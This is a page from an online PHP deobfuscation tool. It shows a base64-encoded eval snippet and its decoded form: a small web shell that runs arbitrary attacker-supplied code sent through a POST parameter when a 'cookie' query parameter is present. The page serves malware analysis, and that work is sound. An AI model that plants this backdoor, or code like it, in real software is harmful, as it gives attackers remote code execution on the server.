Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

@eval(base64_decode("aWYgKGlzc2V0KCRfR0VUWyJjb29raWUiXSkpIHsgZWNobyAiY29va2llPTQiOyBpZiAoa..

Decoded Output download

if (isset($_GET["cookie"])) { echo "cookie=4"; if (isset($_POST[$cookey])) eval(base64_decode($_POST[$cookey])); exit; }

Did this file decode correctly?

Original Code

@eval(base64_decode("aWYgKGlzc2V0KCRfR0VUWyJjb29raWUiXSkpIHsgZWNobyAiY29va2llPTQiOyBpZiAoaXNzZXQoJF9QT1NUWyRjb29rZXldKSkgQGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJGNvb2tleV0pKTsgZXhpdDsgfQ=="));

Function Calls

base64_decode 1

Variables

None

Stats

MD5 c49c0f480ef410086f34da7f968e8c50
Eval Count 1
Decode Time 252 ms